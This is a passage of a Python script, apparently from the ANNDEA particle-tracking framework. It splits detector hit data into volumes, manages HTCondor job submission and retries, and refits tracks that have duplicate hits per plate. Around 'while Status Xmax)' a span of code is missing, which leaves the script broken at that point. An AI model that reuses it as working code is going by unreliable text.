parser.parse_args()\nMode=args.Mode.upper()\nModelName=args.ModelName\nRecBatchID=args.RecBatchID\nPatience=int(args.Patience)\nSubPause=int(args.SubPause)*60\nTrackFitCut=ast.literal_eval(args.TrackFitCut)\nSubGap=int(args.SubGap)\nLocalSub=(args.LocalSub=='Y')\nif LocalSub:\n time_int=0\nelse:\n time_int=10\nJobFlavour=args.JobFlavour\nRequestExtCPU=int(args.RequestExtCPU)\nReqMemory=args.ReqMemory\ninput_file_location=args.f\nXmin,Xmax,Ymin,Ymax=float(args.Xmin),float(args.Xmax),float(args.Ymin),float(args.Ymax)\nZ_overlap,Y_overlap,X_overlap=int(args.Z_overlap),int(args.Y_overlap),int(args.X_overlap)\nSliceData=max(Xmin,Xmax,Ymin,Ymax)>0 #We don't slice data if all values are set to zero simultaneousy (which is the default setting)\n\n#Loading Directory locations\nimport csv\ncsv_reader=open('../config',\"r\")\nconfig = list(csv.reader(csv_reader))\nfor c in config:\n if c[0]=='AFS_DIR':\n AFS_DIR=c[1]\n if c[0]=='EOS_DIR':\n EOS_DIR=c[1]\n if c[0]=='PY_DIR':\n PY_DIR=c[1]\ncsv_reader.close()\nimport sys\nsys.path.insert(1, AFS_DIR+'/Code/Utilities/')\nimport UtilityFunctions as UF #This is where we keep routine utility functions\nimport Parameters as PM #This is where we keep framework global parameters\n\n#Establishing paths\nEOSsubDIR=EOS_DIR+'/'+'ANNDEA'\nEOSsubModelDIR=EOSsubDIR+'/'+'Models'\nModel_Meta_Path=EOSsubModelDIR+'/'+args.ModelName+'_Meta'\nprint(UF.TimeStamp(),bcolors.BOLD+'Preparation 1/3:'+bcolors.ENDC+' Setting up metafiles...')\n#Loading the model meta file\nprint(UF.TimeStamp(),'Loading the data file ',bcolors.OKBLUE+Model_Meta_Path+bcolors.ENDC)\n\nif args.ModelName=='blank':\n print(UF.TimeStamp(),bcolors.WARNING+'You 
have specified the model name as \"blank\": This means that no GNN model will be used as part of the tracking process which can degrade the tracking performance.'+bcolors.ENDC)\n UserAnswer=input(bcolors.BOLD+\"Do you want to continue? (y/n)\\n\"+bcolors.ENDC)\n if UserAnswer.upper()=='N':\n exit()\n stepX=PM.stepX\n stepY=PM.stepY\n stepZ=PM.stepZ\n cut_dt=PM.cut_dt\n cut_dr=PM.cut_dr\nelif os.path.isfile(Model_Meta_Path):\n Model_Meta_Raw=UF.PickleOperations(Model_Meta_Path, 'r', 'N/A')\n print(Model_Meta_Raw[1])\n Model_Meta=Model_Meta_Raw[0]\n stepX=Model_Meta.stepX\n stepY=Model_Meta.stepY\n stepZ=Model_Meta.stepZ\n cut_dt=Model_Meta.cut_dt\n cut_dr=Model_Meta.cut_dr\nelse:\n print(UF.TimeStamp(),bcolors.FAIL+'Fail! No existing model meta files have been found, exiting now'+bcolors.ENDC)\n exit()\n\n######################################## Phase 1 - Create compact source file #########################################\nprint(UF.TimeStamp(),bcolors.BOLD+'Preparation 2/3:'+bcolors.ENDC+' Preparing the source data...')\nrequired_file_location=EOS_DIR+'/ANNDEA/Data/REC_SET/RTr1_'+RecBatchID+'_hits.csv'\nif os.path.isfile(required_file_location)==False or Mode=='RESET':\n print(UF.TimeStamp(),'Loading raw data from',bcolors.OKBLUE+input_file_location+bcolors.ENDC)\n data=pd.read_csv(input_file_location,\n header=0,\n usecols=[PM.Hit_ID,PM.x,PM.y,PM.z,PM.tx,PM.ty])[[PM.Hit_ID,PM.x,PM.y,PM.z,PM.tx,PM.ty]]\n total_rows=len(data.axes[0])\n data[PM.Hit_ID] = data[PM.Hit_ID].astype(str)\n print(UF.TimeStamp(),'The raw data has ',total_rows,' hits')\n print(UF.TimeStamp(),'Removing unreconstructed hits...')\n data=data.dropna()\n final_rows=len(data.axes[0])\n print(UF.TimeStamp(),'The cleaned data has ',final_rows,' hits')\n try:\n data[PM.Hit_ID] = data[PM.Hit_ID].astype(int)\n except:\n print(UF.TimeStamp(), bcolors.WARNING+\"Hit ID is already in the string format, skipping the reformatting step...\"+bcolors.ENDC)\n data[PM.Hit_ID] = data[PM.Hit_ID].astype(str)\n \n if SliceData:\n print(UF.TimeStamp(),'Slicing the data...')\n data=data.drop(data.index[(data[PM.x] > Xmax) | (data[PM.x] < Xmin) | (data[PM.y] > Ymax) | (data[PM.y] < Ymin)])\n final_rows=len(data.axes[0])\n print(UF.TimeStamp(),'The sliced data has ',final_rows,' hits')\n data=data.rename(columns={PM.x: \"x\"})\n data=data.rename(columns={PM.y: \"y\"})\n data=data.rename(columns={PM.z: \"z\"})\n data=data.rename(columns={PM.tx: \"tx\"})\n data=data.rename(columns={PM.ty: \"ty\"})\n data=data.rename(columns={PM.Hit_ID: \"Hit_ID\"})\n print(UF.TimeStamp(),'Analysing data... ',bcolors.ENDC)\n z_offset=data['z'].min()\n data['z']=data['z']-z_offset\n z_max=data['z'].max()\n if Z_overlap==1:\n Zsteps=math.ceil((z_max)/stepZ)\n else:\n Zsteps=(math.ceil((z_max)/stepZ)*(Z_overlap))-1\n y_offset=data['y'].min()\n x_offset=data['x'].min()\n data['x']=data['x']-x_offset\n data['y']=data['y']-y_offset\n x_max=data['x'].max()\n y_max=data['y'].max()\n \n #Calculating the number of volumes that will be sent to HTCondor for reconstruction. 
Account for overlap if specified.\n if X_overlap==1:\n Xsteps=math.ceil((x_max)/stepX)\n else:\n Xsteps=(math.ceil((x_max)/stepX)*(X_overlap))-1\n \n if Y_overlap==1:\n Ysteps=math.ceil((y_max)/stepY)\n else:\n Ysteps=(math.ceil((y_max)/stepY)*(Y_overlap))-1\n print(UF.TimeStamp(),'Distributing input files...')\n for i in range(Xsteps):\n for j in range(Ysteps):\n Y_ID=int(j)/Y_overlap\n X_ID=int(i)/X_overlap\n tdata=data.drop(data.index[data['x'] >= ((X_ID+1)*stepX)]) #Keeping the relevant z slice\n tdata.drop(tdata.index[tdata['x'] < (X_ID*stepX)], inplace = True) #Keeping the relevant z slice\n tdata.drop(tdata.index[tdata['y'] >= ((Y_ID+1)*stepY)], inplace = True) #Keeping the relevant z slice\n tdata.drop(tdata.index[tdata['y'] < (Y_ID*stepY)], inplace = True) #Keeping the relevant z slice\n required_tfile_location=EOS_DIR+'/ANNDEA/Data/REC_SET/RTr1_'+RecBatchID+'_'+str(i)+'_'+str(j)+'_hits.csv'\n tdata.to_csv(required_tfile_location,index=False)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"The segment data has been created successfully and written to\"+bcolors.ENDC, bcolors.OKBLUE+required_tfile_location+bcolors.ENDC)\n data.to_csv(required_file_location,index=False)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"The segment data has been created successfully and written to\"+bcolors.ENDC, bcolors.OKBLUE+required_file_location+bcolors.ENDC)\n\n# ######################################## Preset framework parameters #########################################\ninput_file_location=EOS_DIR+'/ANNDEA/Data/REC_SET/RTr1_'+RecBatchID+'_hits.csv'\nprint(UF.TimeStamp(),'Loading preselected data from ',bcolors.OKBLUE+input_file_location+bcolors.ENDC)\ndata=pd.read_csv(input_file_location,header=0,usecols=['z','x','y'])\nprint(UF.TimeStamp(),'Analysing data... ',bcolors.ENDC)\nz_offset=data['z'].min()\ndata['z']=data['z']-z_offset\nz_max=data['z'].max()\nif Z_overlap==1:\n Zsteps=math.ceil((z_max)/stepZ)\nelse:\n Zsteps=(math.ceil((z_max)/stepZ)*(Z_overlap))-1\ny_offset=data['y'].min()\nx_offset=data['x'].min()\ndata['x']=data['x']-x_offset\ndata['y']=data['y']-y_offset\nx_max=data['x'].max()\ny_max=data['y'].max()\nFreshStart=True\nProgram=[]\n#Calculating the number of volumes that will be sent to HTCondor for reconstruction. 
Account for overlap if specified.\nif X_overlap==1:\n Xsteps=math.ceil((x_max)/stepX)\nelse:\n Xsteps=(math.ceil((x_max)/stepX)*(X_overlap))-1\n\nif Y_overlap==1:\n Ysteps=math.ceil((y_max)/stepY)\nelse:\n Ysteps=(math.ceil((y_max)/stepY)*(Y_overlap))-1\n\n#Defining handy functions to make the code little cleaner\n\n#The function bellow helps to monitor the HTCondor jobs and keep the submission flow\ndef AutoPilot(wait_min, interval_min, max_interval_tolerance,program):\n print(UF.TimeStamp(),'Going on an autopilot mode for ',wait_min, 'minutes while checking HTCondor every',interval_min,'min',bcolors.ENDC)\n wait_sec=wait_min*60\n interval_sec=interval_min*60\n intervals=int(math.ceil(wait_sec/interval_sec))\n for interval in range(1,intervals+1):\n time.sleep(interval_sec)\n print(UF.TimeStamp(),\"Scheduled job checkup...\") #Progress display\n bad_pop=UF.CreateCondorJobs(program[1][0],\n program[1][1],\n program[1][2],\n program[1][3],\n program[1][4],\n program[1][5],\n program[1][6],\n program[1][7],\n program[1][8],\n program[2],\n program[3],\n program[1][9],\n False)\n if len(bad_pop)>0:\n print(UF.TimeStamp(),bcolors.WARNING+'Autopilot status update: There are still', len(bad_pop), 'HTCondor jobs remaining'+bcolors.ENDC)\n if interval%max_interval_tolerance==0:\n for bp in bad_pop:\n UF.SubmitJobs2Condor(bp,program[5],RequestExtCPU,JobFlavour,ReqMemory)\n print(UF.TimeStamp(), bcolors.OKGREEN+\"All jobs have been resubmitted\"+bcolors.ENDC)\n else:\n return True,False\n return False,False\n#The function bellow helps to automate the submission process\ndef StandardProcess(program,status,freshstart):\n print(bcolors.HEADER+\"#############################################################################################\"+bcolors.ENDC)\n print(UF.TimeStamp(),bcolors.BOLD+'Stage '+str(status)+':'+bcolors.ENDC+str(program[status][0]))\n batch_sub=program[status][4]>1\n bad_pop=UF.CreateCondorJobs(program[status][1][0],\n program[status][1][1],\n program[status][1][2],\n program[status][1][3],\n program[status][1][4],\n program[status][1][5],\n program[status][1][6],\n program[status][1][7],\n program[status][1][8],\n program[status][2],\n program[status][3],\n program[status][1][9],\n False)\n if len(bad_pop)==0:\n print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n return True,False\n\n\n elif (program[status][4])==len(bad_pop):\n bad_pop=UF.CreateCondorJobs(program[status][1][0],\n program[status][1][1],\n program[status][1][2],\n program[status][1][3],\n program[status][1][4],\n program[status][1][5],\n program[status][1][6],\n program[status][1][7],\n program[status][1][8],\n program[status][2],\n program[status][3],\n program[status][1][9],\n batch_sub)\n print(UF.TimeStamp(),'Submitting jobs to HTCondor... 
',bcolors.ENDC)\n        _cnt=0\n        for bp in bad_pop:\n            if _cnt>SubGap:\n                print(UF.TimeStamp(),'Pausing submissions for ',str(int(SubPause/60)), 'minutes to relieve congestion...',bcolors.ENDC)\n                time.sleep(SubPause)\n                _cnt=0\n            UF.SubmitJobs2Condor(bp,program[status][5],RequestExtCPU,JobFlavour,ReqMemory)\n            _cnt+=bp[6]\n        if program[status][5]:\n            print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n            return True,False\n        elif AutoPilot(600,time_int,Patience,program[status]):\n            print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n            return True,False\n        else:\n            print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is incomplete...'+bcolors.ENDC)\n            return False,False\n\n\n    elif len(bad_pop)>0:\n        if freshstart:\n            print(UF.TimeStamp(),bcolors.WARNING+'Warning, there are still', len(bad_pop), 'HTCondor jobs remaining'+bcolors.ENDC)\n            print(bcolors.BOLD+'If you would like to exit please enter E'+bcolors.ENDC)\n            print(bcolors.BOLD+'If you would like to wait please enter the maximum wait time in minutes'+bcolors.ENDC)\n            print(bcolors.BOLD+'If you would like to resubmit please enter R'+bcolors.ENDC)\n            UserAnswer=input(bcolors.BOLD+\"Please, enter your option\\n\"+bcolors.ENDC)\n            if UserAnswer=='E':\n                print(UF.TimeStamp(),'OK, exiting now then')\n                exit()\n            if UserAnswer=='R':\n                _cnt=0\n                for bp in bad_pop:\n                    if _cnt>SubGap:\n                        print(UF.TimeStamp(),'Pausing submissions for ',str(int(SubPause/60)), 'minutes to relieve congestion...',bcolors.ENDC)\n                        time.sleep(SubPause)\n                        _cnt=0\n                    UF.SubmitJobs2Condor(bp,program[status][5],RequestExtCPU,JobFlavour,ReqMemory)\n                    _cnt+=bp[6]\n                print(UF.TimeStamp(), bcolors.OKGREEN+\"All jobs have been resubmitted\"+bcolors.ENDC)\n                if program[status][5]:\n                    print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n                    return True,False\n                elif AutoPilot(600,time_int,Patience,program[status]):\n                    print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n                    return True,False\n                else:\n                    print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is incomplete...'+bcolors.ENDC)\n                    return False,False\n            else:\n                if program[status][5]:\n                    print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n                    return True,False\n                elif AutoPilot(int(UserAnswer),time_int,Patience,program[status]):\n                    print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n                    return True,False\n                else:\n                    print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is incomplete...'+bcolors.ENDC)\n                    return False,False\n        else:\n            _cnt=0\n            for bp in bad_pop:\n                if _cnt>SubGap:\n                    print(UF.TimeStamp(),'Pausing submissions for ',str(int(SubPause/60)), 'minutes to relieve congestion...',bcolors.ENDC)\n                    time.sleep(SubPause)\n                    _cnt=0\n                UF.SubmitJobs2Condor(bp,program[status][5],RequestExtCPU,JobFlavour,ReqMemory)\n                _cnt+=bp[6]\n            if program[status][5]:\n                print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n                return True,False\n            elif AutoPilot(600,time_int,Patience,program[status]):\n                print(UF.TimeStamp(),bcolors.OKGREEN+'Stage '+str(status)+' has successfully completed'+bcolors.ENDC)\n                return True,False\n            else:\n                print(UF.TimeStamp(),bcolors.FAIL+'Stage '+str(status)+' is incomplete...'+bcolors.ENDC)\n                return False,False\n\n#If we choose the reset mode we do a full cleanup.\n#Reconstructing a single brick can result in the 
generation of 100s of thousands of files - we need to make sure that we remove them.\nif Mode=='RESET':\n    print(UF.TimeStamp(),'Performing the cleanup... ',bcolors.ENDC)\n    HTCondorTag=\"SoftUsed == \\\"ANNDEA-RTr1a-\"+RecBatchID+\"\\\"\"\n    UF.RecCleanUp(AFS_DIR, EOS_DIR, 'RTr1_'+RecBatchID, ['RTr1a','RTr1b','RTr1c','RTr1d',RecBatchID+'_RTr_OUTPUT_CLEANED.csv'], HTCondorTag)\n    FreshStart=False\nif Mode=='CLEANUP':\n    Status=5\nelse:\n    Status=int(args.ForceStatus)\n################ Set the execution sequence for the script\n###### Stage 0\nprog_entry=[]\njob_sets=[]\nfor i in range(0,Xsteps):\n    job_sets.append(Ysteps)\nprog_entry.append(' Sending hit cluster to the HTCondor, so the model assigns weights between hits')\nprog_entry.append([AFS_DIR,EOS_DIR,PY_DIR,'/ANNDEA/Data/REC_SET/','hit_cluster_rec_set','RTr1a','.csv',RecBatchID,job_sets,'RTr1a_ReconstructTracks_Sub.py'])\nprog_entry.append([' --stepZ ', ' --stepY ', ' --stepX ', ' --cut_dt ', ' --cut_dr ', ' --ModelName ',' --Z_overlap ',' --Y_overlap ',' --X_overlap ', ' --Z_ID_Max ', ' --CheckPoint ', ' --TrackFitCutRes ',' --TrackFitCutSTD ',' --TrackFitCutMRes '])\nprog_entry.append([stepZ,stepY,stepX, cut_dt,cut_dr, ModelName,Z_overlap,Y_overlap,X_overlap, Zsteps, args.CheckPoint]+TrackFitCut)\nprog_entry.append(Xsteps*Ysteps)\nprog_entry.append(LocalSub)\nProgram.append(prog_entry)\n\nif Mode=='RESET':\n    print(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Delete'))\n#Setting up folders for the output. The reconstruction of just one brick can easily generate >100k of files. Keeping all that blob in one directory can cause problems on lxplus.\nprint(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Create'))\n\n###### Stage 1\nprog_entry=[]\njob_sets=Xsteps\nprog_entry.append(' Sending hit cluster to the HTCondor, so the reconstructed clusters can be merged along y-axis')\nprog_entry.append([AFS_DIR,EOS_DIR,PY_DIR,'/ANNDEA/Data/REC_SET/','hit_cluster_rec_y_set','RTr1b','.csv',RecBatchID,job_sets,'RTr1b_LinkSegmentsY_Sub.py'])\nprog_entry.append([' --Y_ID_Max ', ' --i '])\nprog_entry.append([Ysteps,Xsteps])\nprog_entry.append(Xsteps)\nprog_entry.append(LocalSub)\nProgram.append(prog_entry)\nif Mode=='RESET':\n    print(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Delete'))\n#Setting up folders for the output. The reconstruction of just one brick can easily generate >100k of files. Keeping all that blob in one directory can cause problems on lxplus.\nprint(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Create'))\n\n###### Stage 2\nprog_entry=[]\njob_sets=1\nprog_entry.append(' Sending hit cluster to the HTCondor, so the reconstructed clusters can be merged along x-axis')\nprog_entry.append([AFS_DIR,EOS_DIR,PY_DIR,'/ANNDEA/Data/REC_SET/','hit_cluster_rec_x_set','RTr1c','.csv',RecBatchID,job_sets,'RTr1c_LinkSegmentsX_Sub.py'])\nprog_entry.append([' --X_ID_Max '])\nprog_entry.append([Xsteps])\nprog_entry.append(1)\nprog_entry.append(True) #This part we can execute locally, no need for HTCondor\nProgram.append(prog_entry)\nif Mode=='RESET':\n    print(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Delete'))\n#Setting up folders for the output. The reconstruction of just one brick can easily generate >100k of files. 
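(As an illustration only: with Xsteps=50 and Ysteps=50 the first stage alone would produce 2500 cluster files - hypothetical numbers, not from the source.) 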
Keeping all that blob in one directory can cause problems on lxplus.\nprint(UF.TimeStamp(),UF.ManageTempFolders(prog_entry,'Create'))\n\n###### Stage 3\nProgram.append('Custom')\n\n\nprint(UF.TimeStamp(),'There are '+str(len(Program)+1)+' stages (0-'+str(len(Program))+') of this script',bcolors.ENDC)\nprint(UF.TimeStamp(),'Current stage has a code',Status,bcolors.ENDC)\nwhile Status Xmax) | (Data[PM.x] < Xmin) | (Data[PM.y] > Ymax) | (Data[PM.y] < Ymin)]) #The focus area where we reconstruct\n    else:\n        CutData=Data #If we reconstruct the whole brick we just take the whole data. No need to separate.\n\n    CutData.drop([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID'],axis=1,inplace=True,errors='ignore') #Removing old ANNDEA reconstruction results so we can overwrite with the new ones\n    #Map reconstructed ANN tracks to hits in the Raw file - this is essential for the final output of the tracking\n    TrackMap['HitID'] = TrackMap['HitID'].astype(str)\n    CutData[PM.Hit_ID] = CutData[PM.Hit_ID].astype(str)\n    CutData=pd.merge(CutData,TrackMap,how='left', left_on=[PM.Hit_ID], right_on=['HitID'])\n\n    CutData.drop(['HitID'],axis=1,inplace=True) #Make sure that HitID is not the Hit ID name in the raw data.\n    Data=CutData\n\n\n    #It was discovered that the output is not perfect: while the hit fidelity is achieved we don't have a full plate hit fidelity for a given track. It is still possible for a track to have multiple hits at one plate.\n    #In order to fix it we need to apply some additional logic to those problematic tracks.\n    print(UF.TimeStamp(),'Identifying problematic tracks where there is more than one hit per plate...')\n    Hit_Map=Data[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.x,PM.y,PM.z,PM.tx,PM.ty,PM.Hit_ID]] #Separating the hit map\n    Data.drop([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID'],axis=1,inplace=True) #Remove the ANNDEA tracking info from the main data\n\n\n\n\n\n    Hit_Map=Hit_Map.dropna() #Remove unreconstructed hits - we are not interested in them at the moment\n    Hit_Map_Stats=Hit_Map[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,PM.Hit_ID]] #Calculating the stats\n\n    Hit_Map_Stats=Hit_Map_Stats.groupby([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID']).agg({PM.z:pd.Series.nunique,PM.Hit_ID: pd.Series.nunique}).reset_index() #Calculate the number of unique plates and hits\n    Ini_No_Tracks=len(Hit_Map_Stats)\n    print(UF.TimeStamp(),bcolors.WARNING+'The initial number of tracks is '+ str(Ini_No_Tracks)+bcolors.ENDC)\n    Hit_Map_Stats=Hit_Map_Stats.rename(columns={PM.z: \"No_Plates\",PM.Hit_ID:\"No_Hits\"}) #Renaming the columns so they don't interfere once we join it back to the hit map\n    Hit_Map_Stats=Hit_Map_Stats[Hit_Map_Stats.No_Plates >= PM.MinHitsTrack]\n    Prop_No_Tracks=len(Hit_Map_Stats)\n    print(UF.TimeStamp(),bcolors.WARNING+'After dropping single hit tracks, '+ str(Prop_No_Tracks)+' tracks remain...'+bcolors.ENDC)\n    Hit_Map=pd.merge(Hit_Map,Hit_Map_Stats,how='inner',on = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID']) #Join back to the hit map\n    Good_Tracks=Hit_Map[Hit_Map.No_Plates == Hit_Map.No_Hits] #For all good tracks the number of hits matches the number of plates, we won't touch them\n    Good_Tracks=Good_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.Hit_ID]] #Just strip off the information that we don't need anymore\n\n    Bad_Tracks=Hit_Map[Hit_Map.No_Plates < Hit_Map.No_Hits] #These are the bad guys. 
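Their hit count exceeds their plate count, which means at least one plate carries more than one hit. 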
We need to remove these extra hits\n    Bad_Tracks=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.x,PM.y,PM.z,PM.tx,PM.ty,PM.Hit_ID]]\n\n    #Identify the problematic plates\n    Bad_Tracks_Stats=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z,PM.Hit_ID]]\n    Bad_Tracks_Stats=Bad_Tracks_Stats.groupby([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z])[PM.Hit_ID].nunique().reset_index() #Which plates have double hits?\n    Bad_Tracks_Stats=Bad_Tracks_Stats.rename(columns={PM.Hit_ID: \"Problem\"}) #Renaming the columns so they don't interfere once we join it back to the hit map\n    Bad_Tracks_Stats[RecBatchID+'_Brick_ID'] = Bad_Tracks_Stats[RecBatchID+'_Brick_ID'].astype(str)\n    Bad_Tracks_Stats[RecBatchID+'_Track_ID'] = Bad_Tracks_Stats[RecBatchID+'_Track_ID'].astype(str)\n    Bad_Tracks[RecBatchID+'_Brick_ID'] = Bad_Tracks[RecBatchID+'_Brick_ID'].astype(str)\n    Bad_Tracks[RecBatchID+'_Track_ID'] = Bad_Tracks[RecBatchID+'_Track_ID'].astype(str)\n    Bad_Tracks=pd.merge(Bad_Tracks,Bad_Tracks_Stats,how='inner',on = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z])\n\n\n\n    Bad_Tracks.sort_values([RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID',PM.z],ascending=[0,0,1],inplace=True)\n\n    Bad_Tracks_CP_File=EOS_DIR+'/ANNDEA/Data/REC_SET/Temp_RTr1c_'+RecBatchID+'_0'+'/RTr1c_'+RecBatchID+'_Bad_Tracks_CP.csv'\n    if os.path.isfile(Bad_Tracks_CP_File)==False or Mode=='RESET':\n\n        Bad_Tracks_Head=Bad_Tracks[[RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID']]\n        Bad_Tracks_Head.drop_duplicates(inplace=True)\n        Bad_Tracks_List=Bad_Tracks.values.tolist() #I find it is much easier to deal with tracks in list format when it comes to fitting\n        Bad_Tracks_Head=Bad_Tracks_Head.values.tolist()\n        Bad_Track_Pool=[]\n\n        #Below we build the track representation that we can use to fit slopes\n        with alive_bar(len(Bad_Tracks_Head),force_tty=True, title='Building track representations...') as bar:\n            for bth in Bad_Tracks_Head:\n                bar()\n                bth.append([])\n                bt=0\n                trigger=False\n                while bt<(len(Bad_Tracks_List)):\n                    if (bth[0]==Bad_Tracks_List[bt][0] and bth[1]==Bad_Tracks_List[bt][1]):\n                        if Bad_Tracks_List[bt][8]==1: #We only build polynomials for hits in a track that do not have duplicates - these are 'trusted hits'\n                            bth[2].append(Bad_Tracks_List[bt][2:-2])\n                        del Bad_Tracks_List[bt]\n                        bt-=1\n                        trigger=True\n                    elif trigger:\n                        break\n                    else:\n                        continue\n                    bt+=1\n\n\n        with alive_bar(len(Bad_Tracks_Head),force_tty=True, title='Fitting the tracks...') as bar:\n            for bth in Bad_Tracks_Head:\n                bar()\n                if len(bth[2])==1: #Only one trusted hit - In these cases we take only the tx and ty slopes of the single base track. 
Polynomial of the first degree and the equations of the line are x=ax+tx*z and y=ay+ty*z\n                    x=bth[2][0][0]\n                    z=bth[2][0][2]\n                    tx=bth[2][0][3]\n                    ax=x-tx*z\n                    bth.append(ax) #Append x intercept\n                    bth.append(tx) #Append x slope\n                    bth.append(0) #Append a placeholder slope (for polynomial case)\n                    y=bth[2][0][1]\n                    ty=bth[2][0][4]\n                    ay=y-ty*z\n                    bth.append(ay) #Append y intercept\n                    bth.append(ty) #Append y slope\n                    bth.append(0) #Append a placeholder slope (for polynomial case)\n                    del(bth[2])\n                elif len(bth[2])==2: #Two trusted hits - In these cases we fit a polynomial of the first degree and the equations of the line are x=ax+tx*z and y=ay+ty*z\n                    x,y,z=[],[],[]\n                    x=[bth[2][0][0],bth[2][1][0]]\n                    y=[bth[2][0][1],bth[2][1][1]]\n                    z=[bth[2][0][2],bth[2][1][2]]\n                    tx=np.polyfit(z,x,1)[0]\n                    ax=np.polyfit(z,x,1)[1]\n                    ty=np.polyfit(z,y,1)[0]\n                    ay=np.polyfit(z,y,1)[1]\n                    bth.append(ax) #Append x intercept\n                    bth.append(tx) #Append x slope\n                    bth.append(0) #Append a placeholder slope (for polynomial case)\n                    bth.append(ay) #Append y intercept\n                    bth.append(ty) #Append y slope\n                    bth.append(0) #Append a placeholder slope (for polynomial case)\n                    del(bth[2])\n                elif len(bth[2])==0:\n                    del(bth)\n                    continue\n                else: #Three or more trusted hits - In these cases we fit a polynomial of the second degree and the equations of the line are x=ax+(t1x*z)+(t2x*z*z) and y=ay+(t1y*z)+(t2y*z*z)\n                    x,y,z=[],[],[]\n                    for i in bth[2]:\n                        x.append(i[0])\n                    for j in bth[2]:\n                        y.append(j[1])\n                    for k in bth[2]:\n                        z.append(k[2])\n                    t2x=np.polyfit(z,x,2)[0]\n                    t1x=np.polyfit(z,x,2)[1]\n                    ax=np.polyfit(z,x,2)[2]\n\n                    t2y=np.polyfit(z,y,2)[0]\n                    t1y=np.polyfit(z,y,2)[1]\n                    ay=np.polyfit(z,y,2)[2]\n\n                    bth.append(ax) #Append x intercept\n                    bth.append(t1x) #Append x slope\n                    bth.append(t2x) #Append the x quadratic coefficient\n                    bth.append(ay) #Append y intercept\n                    bth.append(t1y) #Append y slope\n                    bth.append(t2y) #Append the y quadratic coefficient\n                    del(bth[2])\n\n\n        #Once we get coefficients for all tracks we convert them back to a Pandas dataframe and join back to the data\n        Bad_Tracks_Head=pd.DataFrame(Bad_Tracks_Head, columns = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID','ax','t1x','t2x','ay','t1y','t2y'])\n\n        print(UF.TimeStamp(),'Saving the checkpoint file ',bcolors.OKBLUE+Bad_Tracks_CP_File+bcolors.ENDC)\n        Bad_Tracks_Head.to_csv(Bad_Tracks_CP_File,index=False)\n    else:\n        print(UF.TimeStamp(),'Loading the checkpoint file ',bcolors.OKBLUE+Bad_Tracks_CP_File+bcolors.ENDC)\n        Bad_Tracks_Head=pd.read_csv(Bad_Tracks_CP_File,header=0)\n        Bad_Tracks_Head=Bad_Tracks_Head[Bad_Tracks_Head.ax != '[]']\n        Bad_Tracks_Head['ax'] = Bad_Tracks_Head['ax'].astype(float)\n        Bad_Tracks_Head['ay'] = Bad_Tracks_Head['ay'].astype(float)\n        Bad_Tracks_Head['t1x'] = Bad_Tracks_Head['t1x'].astype(float)\n        Bad_Tracks_Head['t2x'] = Bad_Tracks_Head['t2x'].astype(float)\n        Bad_Tracks_Head['t1y'] = Bad_Tracks_Head['t1y'].astype(float)\n        Bad_Tracks_Head['t2y'] = Bad_Tracks_Head['t2y'].astype(float)\n\n    print(UF.TimeStamp(),'Removing problematic hits...')\n    Bad_Tracks=pd.merge(Bad_Tracks,Bad_Tracks_Head,how='inner',on = [RecBatchID+'_Brick_ID',RecBatchID+'_Track_ID'])\n\n\n\n    print(UF.TimeStamp(),'Calculating x and y coordinates of the fitted line for all plates in the track...')\n    #Calculating x and y coordinates of the fitted line for all plates in the track\n    Bad_Tracks['new_x']=Bad_Tracks['ax']+(Bad_Tracks[PM.z]*Bad_Tracks['t1x'])+((Bad_Tracks[PM.z]**2)*Bad_Tracks['t2x'])\n    
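#Added worked illustration (hypothetical numbers, not from the source): a track with ax=1.0, t1x=0.5, t2x=0.1 evaluated at z=2 gives new_x = 1.0 + 0.5*2 + 0.1*(2**2) = 2.4\n    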
